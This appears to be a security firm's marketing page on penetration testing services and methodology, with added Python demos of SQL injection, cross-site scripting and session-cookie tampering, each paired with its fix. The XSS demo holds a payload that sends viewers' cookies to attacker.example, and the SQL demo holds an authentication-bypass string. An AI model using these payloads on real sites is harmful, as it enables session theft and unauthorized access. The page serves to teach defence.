Penetration Testing

Our security experts take on the role of an attacker, trying to compromise IT systems and employees to discover weaknesses that real attackers could exploit. We collect the results of the simulated attacks, summarize them and present our findings in a report that opens with an executive summary. Each vulnerability found is ranked according to CVSS v3 and comes with our specific recommendations for fixing it.

According to the Cisco 2018 Annual Cybersecurity Report, 31% of security professionals reported that their organization had already experienced cyber attacks on their IT infrastructure. Further, ransomware attacks are growing by more than 350 percent annually.

Penetration testing is one of the most widely used security assessment activities for companies. It is a proven method of evaluating the security of networks, infrastructure and applications by simulating a malicious attack and observing which weaknesses can actually be exploited.

Taking good care of your IT environment means ensuring your assets are not vulnerable to cybercriminals and cyberthreats.

PENETRATION TESTING TYPES

Web Application penetration testing

Web applications such as portals, microsites and other online tools let users perform actions, unlike static web pages that only display content. Almost every web application processes sensitive data such as user and financial information, which makes it an attractive target for cybercriminals. As web applications grow more complex, the chance that they contain several exploitable weaknesses grows with them.

Automated scanners alone cannot reliably find the vulnerabilities of a customized web application: they miss flaws in business logic, authorization and multi-step workflows, which is why comprehensive security testing has to be done manually by experienced testers.

The Verizon 2017 Data Breach Investigations Report found that almost 60% of breaches involved web applications, either as the affected asset or as the vector to it.

Below are the most common threats that web applications face and that businesses have to tackle to protect their customers’ sensitive data.

Insufficient Input and Output Testing

App developers often skip testing of input validation and output encoding when creating applications, and many business owners believe their applications do not process critical data and hence will not be targeted by malicious actors. Both assumptions leave injection flaws in place.

API Hacks

Application programming interfaces (APIs) can also be attacked to reach a web application’s back-end data and functions directly, bypassing the checks built into the user interface. HackControl offers API penetration testing that checks your APIs for the known vulnerability classes and provides a comprehensive report with recommendations on fixing the bugs found.

SQL Injection

Many web applications build SQL queries by concatenating user input, for example from a login form, directly into the query string. An attacker who notices this can use automated tools to send thousands of crafted inputs, bypass authentication and eventually take control of the whole database. The fix is to pass input as bound parameters rather than to try to block SQL keywords.
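As an added illustration (this is example code, not HackControl’s tooling), the following Python snippet shows a login lookup built by string concatenation next to the parameterized version. The table, accounts and payload are constructed for the demonstration: the input `admin' --` closes the string literal and comments out the password check in SQLite, so the vulnerable function logs the attacker in as admin while the parameterized one treats the same text as an ordinary username and finds nothing.

```python
# Added example (not HackControl's code): a login lookup that concatenates
# user input into SQL, beside the parameterized form that fixes it.
# All data is constructed in-memory for the demonstration.
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed sample users table (clear-text passwords only to keep the demo short)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cr3t-admin", "admin"), ("alice", "alice-pass", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the query with string formatting: the input becomes part of the SQL grammar."""
    query = (
        f"SELECT id, username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Bound parameters: values travel separately from the SQL, so quotes and comments stay data."""
    query = "SELECT id, username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = setup_db()
    payload = "admin' --"  # closes the literal, then '--' comments out the password check
    print("vulnerable   :", login_vulnerable(db, payload, "anything"))
    print("parameterized:", login_parameterized(db, payload, "anything"))
```

The vulnerable query becomes `... WHERE username = 'admin' --' AND password = 'anything'`, which SQLite reads as a lookup of `admin` with the rest commented out; a tester would try the same payload against every form field and URL parameter that ends up in a query.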

DoS and DDoS Attacks

DoS and DDoS attacks are among those most feared by system administrators. We can optionally include DoS and DDoS resistance testing in the scope of the pentest of your web application.

XSS Attacks

Hackers may inject a script into a page that other users view. The script runs in the victim’s browser with the victim’s session; if the victim is an administrator, the attacker can take over that session and, hence, gain control over the whole website and its content.
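As an added example (not code from the original page), the Python below renders a user comment into HTML without and with output encoding, and builds a session cookie with the HttpOnly flag, which stops a script that does run from reading the cookie through `document.cookie`. The comment payload and the host attacker.example are constructed for the demonstration.

```python
# Added example (not HackControl's code): reflecting user text into HTML
# unescaped, beside the escaped version, plus the cookie flags that blunt
# session theft even when an injected script executes. Names are constructed.
import html


def render_comment_unsafe(author: str, comment: str) -> str:
    """Interpolates user text straight into markup: a <script> in the comment runs in every viewer's browser."""
    return f"<div class='comment'><b>{author}</b>: {comment}</div>"


def render_comment_safe(author: str, comment: str) -> str:
    """Escapes & < > \" and ' so the text is displayed as text instead of being parsed as markup."""
    return (
        f"<div class='comment'><b>{html.escape(author, quote=True)}</b>: "
        f"{html.escape(comment, quote=True)}</div>"
    )


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Set-Cookie with HttpOnly (not readable from JavaScript), SameSite and Secure."""
    flags = ["HttpOnly", "SameSite=Lax", "Path=/"]
    if secure:
        flags.append("Secure")
    return "Set-Cookie: session=" + session_id + "; " + "; ".join(flags)


# Constructed payload of the kind a tester submits: ships the viewer's cookies to an attacker host.
XSS_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"

if __name__ == "__main__":
    print(render_comment_unsafe("mallory", XSS_PAYLOAD))
    print(render_comment_safe("mallory", XSS_PAYLOAD))
    print(session_cookie_header("constructed-session-id"))
```

Output encoding has to match the context (HTML body here; attribute, URL and JavaScript contexts need their own encoders), and the cookie flags are defence in depth: they limit what a successful injection can steal but do not remove the injection itself.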

Mobile Application (iOS, Android) testing

Mobile applications have become a significant part of everyday life, and the number of mobile devices keeps growing. With the increasing adoption of mobile applications, it becomes crucial for businesses to protect their users by properly securing the sensitive personal data stored on iOS and Android devices. This is a challenge, since the number of exploitable vulnerabilities has made mobile devices an attractive target for hackers.

According to Arxan cybersecurity research, 90% of the tested mobile devices and applications had at least two of the ten vulnerabilities from the OWASP Mobile Top 10 Risks. So what are the most widespread threats to mobile devices and their operating systems?

Vulnerable server-side mechanism

Servers are where mobile end users’ data is stored and where a mobile application’s business logic runs; the app itself is only a client talking to them. When basic server-side security controls such as authentication, authorization and input validation are skipped, the servers get hacked regardless of how secure the app is.

No Multifactor Authentication

Most users reuse the same password across accounts on different applications, and those passwords rarely follow basic security recommendations. Without a second factor, a password leaked from one service is a gift for hackers who want to compromise the others.

Weak Encryption

Many messengers on mobile platforms, and more than 13% of mobile devices, lack proper encryption, so adversaries who manage to get into those systems see personal data and other valuable content practically in plain text.

Malicious Code Injection

An intruder may inject malicious code into a login form to intercept credentials and gain access to a user’s personal information. To cover such cases we define the security assessment criteria together with you and perform grey-box testing, meaning you give us the necessary information about your application, such as access roles, credentials and functions.

Privileges Escalation

Inappropriate session management, such as session tokens the client can forge or tokens that are not invalidated on logout, gives hackers a good opportunity to escalate privileges. There are many other factors that constitute security threats to mobile devices and their users, but we have enumerated the most important ones.
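As an added example (not HackControl’s code), the Python below contrasts a session cookie that carries the user’s role in plain text, which the client can simply edit to become admin, with one whose payload is HMAC-signed and verified server-side before the role is trusted. The key, account names and cookie format are constructed for the demonstration.

```python
# Added example (not HackControl's code): privilege escalation through a forgeable
# session cookie, beside an HMAC-signed token that the server verifies.
# Key, accounts and cookie layout are constructed for the demo.
import base64
import hashlib
import hmac

SERVER_KEY = b"constructed-demo-key-rotate-me"  # real deployments: random, server-side only


def make_unsigned_session(user: str, role: str) -> str:
    """Session state handed to the client in the clear."""
    return f"user={user};role={role}"


def role_from_unsigned_session(cookie: str) -> str:
    """Trusts whatever the client sends back: editing role=user to role=admin is enough."""
    fields = dict(kv.split("=", 1) for kv in cookie.split(";"))
    return fields["role"]


def _sign(payload: bytes) -> str:
    return base64.urlsafe_b64encode(hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()).decode()


def make_signed_session(user: str, role: str) -> str:
    """Same payload, but followed by a MAC that only the server can produce."""
    payload = f"user={user};role={role}"
    return payload + "|" + _sign(payload.encode())


def role_from_signed_session(cookie: str):
    """Recomputes the MAC and compares in constant time; returns None for any tampered or malformed token."""
    payload, _, tag = cookie.rpartition("|")
    if not payload or not tag:
        return None
    if not hmac.compare_digest(_sign(payload.encode()), tag):
        return None
    return role_from_unsigned_session(payload)


def tamper(cookie: str) -> str:
    """What a low-privileged user does with the cookie the application gave them."""
    return cookie.replace("role=user", "role=admin")


if __name__ == "__main__":
    c = make_unsigned_session("alice", "user")
    print("unsigned, tampered ->", role_from_unsigned_session(tamper(c)))
    s = make_signed_session("alice", "user")
    print("signed, tampered   ->", role_from_signed_session(tamper(s)))
    print("signed, intact     ->", role_from_signed_session(s))
```

Signing stops the client from rewriting its role, but the cleaner design is an opaque random session identifier with the role looked up server-side, which also makes logout and forced invalidation straightforward; a MAC alone does nothing against replay of a stolen token.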

Sensitive Data Storage

It is common practice to store data on the client side. Best practice is to store as little as possible and to add an application-level encryption layer on top of the one provided by the operating system, keeping the key in the platform keystore (iOS Keychain, Android Keystore) rather than next to the data.

NETWORK AND SYSTEM TESTING

Our approach is to identify the most serious risks and security flaws first and then focus on the less obvious areas as the project proceeds. First, we test the network for vulnerabilities from the outside, from the point of view of an uninformed attacker. We then gradually increase the amount of information given to our testers until they assume the role of a trusted user of the network trying to access an unauthorized resource or service. The following list details each access level.

The consistent deployment of this approach is ensured by the use of leading security solutions. Further, the expertise of our staff, combined with the use of comprehensive work-programs that enhance quality control procedures, allows us to consistently deliver the best customer experience.

We combine both manual and automated techniques to unveil vulnerabilities that could exist in your networks. To ensure your security, we create real-world attack scenarios in a controlled and professional fashion. HackControl helps to ensure your sensitive data is properly protected, and compliance requirements are being met by imitating the attacks of real hackers.

External pentest with access level as “naive” hacker

The goal is to establish whether an attacker with little or no knowledge of the targeted network can gain unauthorized access.

External pentest with access level as supplier/customer

The goal is to establish whether a hacker who has the same access level as a customer or supplier can gain unauthorized logical access through an external network.

Internal pentest with access level as an unauthorized user

  • Determine whether unauthorized access can be gained from inside the network by exploiting loopholes in resources and network services.
  • Identify whether a user can manipulate the key controls that protect the company’s system(s).
  • Assess whether the company has procedures in place to detect and respond to such activity and protect the system effectively.
  • Security assessment of sensitive servers and workstations, if there are any.

Firewall and security systems review

Analyze the effectiveness of the policies employed by your firewalls and administrative infrastructure. We review the following:

  • Configuration of the operating system to ensure secure implementation.
  • Procedures and processes responsible for monitoring and reporting incidents on the firewall.
  • Network and host security components (e.g. IDS).

Our Methodology

Our methodology is based on generally accepted industry-wide approaches to penetration testing:

  • OWASP Testing guide
  • BSI A Penetration Testing Model
  • PTES Penetration Testing Execution Standard
  • OSSTMM Open Source Security Testing Methodology Manual

Manual testing is complemented by our own security testing process and experience. We identify vulnerabilities that could be used to steal funds or damage the reputation of the project.

Phases of Penetration Testing

1. Opening Phase

We commence with a kick-off meeting with your responsible technical staff to define exactly what IT systems or employees should be tested. This highly depends on your current pain points, which we are going to find out using an individual and client-oriented approach. The necessary user accounts and access credentials will be provided and responsible contact persons and escalation channels will be defined.

2. Planning and Reconnaissance

We collect information based on the agreement we made in the Opening Phase. Depending on the IT systems that are going to be tested, we will perform automated vulnerability scanning or port scanning to get our security experts prepared for the next active phase. This may also include gathering information about your employees to prepare for a phishing campaign.

3. Information Validation

Our security experts validate the information gathered during Planning and Reconnaissance to confirm that it is accurate and consistent. This helps them identify potential vulnerabilities and weed out false positives from the automated scans.


4. Manual Testing

Following industry-standard methodologies, our security experts try to exploit the identified weaknesses, escalate access privileges and gain access to stored data.

5. Report Preparation

You will receive a report with an executive summary and all vulnerabilities found, ranked according to CVSS v3, along with our recommendations on how to fix them.

6. Remediation

Based on the report, your professionals fix identified vulnerabilities.

7. Re-test

At this stage we can optionally re-check the remediated points and provide you with a final report confirming which of the initially found vulnerabilities have been fixed and which remain open.

What We Offer

We offer 3 main types of web application pentest:

Black-box testing

Our security experts act as uninformed hackers, trying to break into the application without any information from you.

Grey-box testing

You provide us with information on the application’s functionality, credentials, and access roles.

White-Box Testing

You provide us with access to your application’s source code.

Key deliverables

Consultant Technical Report with a detailed findings section. The findings section contains:

  • screenshots and detailed description regarding the reproduction of security issues;
  • the risk level for each vulnerability;
  • remediation recommendations.

Contact us